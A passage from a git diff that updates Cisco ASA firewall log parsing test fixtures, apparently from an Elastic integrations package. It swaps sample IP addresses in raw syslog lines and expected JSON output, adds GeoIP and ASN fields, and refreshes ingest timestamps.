CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364655400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20215,8 +20215,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20250,7 +20250,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20259,8 +20259,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112095648Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364659400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20296,8 +20296,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20331,7 +20331,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20340,8 +20340,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112097305Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364663800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20377,8 +20377,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20412,7 +20412,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20421,8 +20421,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112098975Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364667900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20458,8 +20458,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20493,7 +20493,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20502,8 +20502,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112100697Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364672Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20539,8 +20539,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20574,7 +20574,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20583,8 +20583,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112102392Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364675700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20620,8 +20620,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20655,7 +20655,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20664,8 +20664,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112104035Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364680200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20701,8 +20701,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20736,7 +20736,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20745,8 +20745,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112105681Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364684400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20782,8 +20782,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20817,7 +20817,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20826,8 +20826,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112107320Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364688500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -20863,8 +20863,8 @@ }, "source": { "port": 80, - "address": "100.66.124.24", - "ip": "100.66.124.24" + "address": "192.168.124.24", + "ip": "192.168.124.24" }, "tags": [ "preserve_original_event" @@ -20898,7 +20898,7 @@ "localhost" ], "ip": [ - "100.66.124.24", + "192.168.124.24", "172.31.98.44" ] }, @@ -20907,8 +20907,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:02.112108998Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:31:36.364692900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log index a02a1136b19..7b4ae13e9de 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log @@ -1 +1 @@ -Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 +Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2 diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json index f436174538b..f38b44ec55f 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json @@ -7,18 +7,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 } }, - "address": "1.2.3.4", - "ip": "1.2.3.4" + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -34,13 +40,13 @@ }, "related": { "ip": [ - "1.2.3.4" + "81.2.69.144" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.139615469Z", - "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", + "ingested": "2021-12-09T13:32:10.434308700Z", + "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json index 32f71f62761..70db62062e6 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json @@ -31,7 +31,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:06:19.206386917Z", + "ingested": "2021-12-09T13:32:10.616159800Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-07-19T09:06:19.206392337Z", + "ingested": "2021-12-09T13:32:10.616169400Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.206394377Z", + "ingested": "2021-12-09T13:32:10.616194900Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log index 531c241da79..c51bd423da3 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log @@ -1,2 +1,2 @@ Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0 -Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0 +Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0 diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json index 891f15c8b92..299a4b82c18 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.346120522Z", + "ingested": "2021-12-09T13:32:10.900273500Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", @@ -69,12 +69,12 @@ "level": "informational" }, "destination": { - "address": "192.0.2.15", - "ip": "192.0.2.15" + "address": "192.168.2.15", + "ip": "192.168.2.15" }, "source": { - "address": "192.0.2.134", - "ip": "192.0.2.134" + "address": "192.168.2.134", + "ip": "192.168.2.134" }, "tags": [ "preserve_original_event" @@ -98,8 +98,8 @@ "MYHOSTNAME" ], "ip": [ - "192.0.2.134", - "192.0.2.15" + "192.168.2.134", + "192.168.2.15" ] }, "host": { @@ -107,8 +107,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.346126402Z", - "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.0.2.15/0 gaddr 192.0.2.134/57808 laddr 192.0.2.134/57808 type 8 code 0", + "ingested": "2021-12-09T13:32:10.900281300Z", + "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", "action": "flow-expiration", @@ -122,7 +122,7 @@ }, "cisco": { "asa": { - "mapped_source_ip": "192.0.2.134", + "mapped_source_ip": "192.168.2.134", "icmp_type": 8, "icmp_code": 0 } diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log index 2742be4b533..ca647162cfc 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log @@ -1,3 +1,3 @@ -<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -> OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000] +<165>Oct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -> OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000] Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233 Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json index 3ae6102b703..2eda35d4c50 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json @@ -5,9 +5,27 @@ "level": "notification" }, "destination": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", + "location": { + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } + }, + "address": "81.2.69.144", "port": 53, - "address": "203.0.113.42", - "ip": "203.0.113.42" + "ip": "81.2.69.144" }, "syslog": { "facility": { @@ -16,8 +34,8 @@ }, "source": { "port": 27218, - "address": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244", - "domain": "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "address": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244", + "domain": "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" }, "tags": [ "preserve_original_event" @@ -47,16 +65,16 @@ }, "related": { "hosts": [ - "WHAT-IS-THIS-A-HOSTNAME-192.0.2.244" + "WHAT-IS-THIS-A-HOSTNAME-192.168.2.244" ], "ip": [ - "203.0.113.42" + "81.2.69.144" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.451996709Z", - "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.0.2.244(27218) -\u003e OUTSIDE/203.0.113.42(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:32:11.119441600Z", + "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -120,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.452002310Z", + "ingested": "2021-12-09T13:32:11.119449700Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -202,7 +220,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.452004366Z", + "ingested": "2021-12-09T13:32:11.119455300Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log index 73ea89341b0..5dc7589b754 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log @@ -1,72 +1,72 @@ -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] -Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] -Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882 -Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 -Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.0.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group "acl_dmz" [0xe3aab522, 0x0] +Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -> outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0] +Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -> outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882 +Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882) +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392) +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140 +Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999 Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233 -Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.0.0.130/10879 -Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.0.0.17/80 (192.0.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) -Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.0.0.66/12981 to 10.1.2.60/53 due to DNS Query -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to 